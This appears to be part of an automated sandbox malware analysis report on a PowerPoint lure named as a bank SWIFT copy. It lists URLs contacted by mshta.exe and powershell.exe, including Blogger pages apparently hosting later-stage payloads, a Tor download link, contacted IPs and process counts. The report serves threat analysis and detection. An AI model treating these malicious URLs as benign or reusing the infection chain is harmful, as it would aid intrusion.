                                      https://www.blogger.commshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpfalse
                                        high
                                        https://www.blogger.com/go/privacymshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                            high
                                            https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pimshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpfalse
                                              high
                                              https://resources.blogblog.com/img/icon18_wrench_allbkg.pngkmshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpfalse
                                                high
                                                https://resources.blogblog.com/img/icon18_wrench_allbkg.pngqmshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=pencimshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.jsmshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://www.blogger.com/unvisited-link-mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://mainjigijigi123.blogspotmshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.blogger.com/img/share_buttons_20_3.pngmshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://www.blogger.com/img/share_buttons_20_3.pngamshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://resources.blogblog.com/img/triangle_ltr.gif)mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://www.youtube.commshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://www.blogger.com/go/discussmshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://mainjigijigi123.blogsmshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://mainjigijigi123.blogspot.com/js/cookienotice.jspmshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://www.blogger.com/img/share_buttons_20_3.pngvmshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://ocsp.pki.goog/gts1o1core0mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://resources.blogblog.com/img/widgets/s_top.pngmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjamshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://crl.pki.goog/GTS1O1core.crl0mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://i18n-cloud.appspot.commshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                                    • 0%, Virustotal, Browse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://mainjigijigi123.blogspot.com/js/cookienotice.jsimshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://mainjigijigi123.blogspot.com/js/cookienotice.jsmshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsmshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://mainjigijigi123.blogspot.com/feeds/posts/defaultmshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://www.blogger.com/img/share_buttons_20_3.pngxmshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://schema.org/BlogPostingmshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspngmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                                                                                    high
                                                                                                    https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zippowershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.windows.com/pctv.powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://www.blogger.com/?tab=jjmshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://www.blogger.com/go/contentpolicymshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pimshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://resources.blogblog.com/img/widgets/s_bottom.png)mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlmshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://mainjigijigi123.blogspot.com/p/napmshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQVmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://resources.blogblog.com/img/widgets/s_bottom.pngmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.jsmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://mainjigijigi123.blogspot.com/p/st2222.htmlKmshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.blogger.com/go/devapimshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://mainjigijigi123.blogspot.com/feeds/posts/default?altmshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.blogger.com/go/blogspot-cookiesmshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://resources.blogblog.com/mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://mainjigijigi123.blogspot.com/p/----mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlHmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.blogger.com/static/v1/jsbin/3767mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.blogger.com/rpc_relay.htmlmshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://pki.goog/gsr2/GTS1O1.crt0mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://mainjigijigi123.blogspot.com/p/st2222.htmldmshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://mainjigijigi123.blogspot.com/feeds/posts/defaultngmshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://ocsp.pki.goog/gsmshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://ocsp.pki.goog/gsr202mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://pki.goog/repository/0mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://mainjigijigi123.blogspot.com/p/st2222.htmlmshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=blmshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://mainjigijigi123.blogspot.com/p/st2222.html...mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.blogger.com/feeds/9116518222795791100/posts/defaultmshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogsmshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.blogger.com/static/v1/widgets/84067855-widgets.jsmshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.blogger.com/go/adspersonalizationmshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://mainjigijigi123.blogspot.com/p/st2222.htmlvgmshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://mainjigijigi123.blogspot.com/p/st2222.htmlsmshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspomshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.blogger.com/go/buzzmshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.comshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://randikhanaekminar.blogspot.com/p/st2.htmlC:mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://s.ytimg.commshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscVmshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://backbones1234511a.blogspot.com/p/stback1.htmlmshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmVmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.blogger.com/mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://www.cookiechoices.org/mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rssmshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://crl.pki.goog/gsr2/gsr2.crl0?mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://mainjigijigi123.blogspot.com/js/cookienotice.jsAmshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhvmshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://crl.entrust.net/2048ca.crl0mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://mainjigijigi123.blogspot.com/p/st2222.htmlwmshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                            high

                                                                                                                                                                                                            Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            108.177.127.132
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                            172.67.219.133
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            67.199.248.16
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            396982GOOGLE-PRIVATE-CLOUDUStrue
                                                                                                                                                                                                            104.18.49.20
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            64.188.18.218
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            8100ASN-QUADRANET-GLOBALUSfalse

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                                                            Analysis ID:339086
                                                                                                                                                                                                            Start date:13.01.2021
                                                                                                                                                                                                            Start time:13:42:35
                                                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 10m 23s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:light
                                                                                                                                                                                                            Sample file name:BankSwiftCopyUSD95000.ppt
                                                                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                                            Number of analysed new started processes analysed:40
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • HDC enabled
                                                                                                                                                                                                            • GSI enabled (VBA)
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.troj.expl.evad.winPPT@46/51@29/5
                                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                                            HDC Information:Failed
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 98%
                                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                                                            • Found application associated with file extension: .ppt
                                                                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                                                                            • Scroll down
                                                                                                                                                                                                            • Close Viewer
                                                                                                                                                                                                            Warnings:
                                                                                                                                                                                                            Show All
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 108.177.127.191, 172.217.218.102, 172.217.218.139, 172.217.218.138, 172.217.218.113, 172.217.218.100, 172.217.218.101, 173.194.69.84, 172.217.16.206, 108.177.126.95, 108.177.119.105, 108.177.119.147, 108.177.119.103, 108.177.119.104, 108.177.119.106, 108.177.119.99, 108.177.127.138, 108.177.127.139, 108.177.127.102, 108.177.127.100, 108.177.127.113, 108.177.127.101, 108.177.127.94
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): gstaticadssl.l.google.com, google.com, fonts.googleapis.com, accounts.google.com, www-google-analytics.l.google.com, fonts.gstatic.com, www.google.com, blogger.l.google.com, www.google-analytics.com
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtSetValueKey calls found.

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            13:44:34API Interceptor775x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                            13:44:39API Interceptor1x Sleep call for process: schtasks.exe modified
                                                                                                                                                                                                            13:44:39API Interceptor363x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                            13:44:40API Interceptor435x Sleep call for process: taskeng.exe modified
                                                                                                                                                                                                            13:44:46API Interceptor10x Sleep call for process: taskkill.exe modified
